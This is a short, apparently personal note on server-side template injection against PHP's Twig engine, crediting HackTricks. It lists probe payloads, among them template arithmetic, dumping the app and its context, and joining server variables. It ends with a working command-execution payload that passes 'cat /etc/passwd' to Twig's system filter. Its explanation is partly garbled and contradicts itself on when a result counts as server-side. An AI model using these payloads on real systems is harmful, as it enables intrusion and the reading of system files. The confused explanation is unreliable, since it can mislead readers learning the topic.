SSTI 0x01

SSTI or server side template injection

It will run the code on the server side

like if (let variable_name = (user input = hello)

then (eval(variable_name)

then it will return the result hello in the screen

when we try to execute some commands it will return error

dictates that it was twig error

credits to hacktricks

ssti twig php

{{7*7}}
{{7*'7'}} would result in 49
{{dump(app)}}
{{dump(_context)}}
{{app.request.server.all|join(',')}}

Confirm it

which means that the code that we are putting in is executing the code in server side

If the result here is like {{7*7}} = 49

Then it is a client side

but in this case it was server side executed

View some /etc/passwd

{{['cat\x20/etc/passwd']|filter('system')}}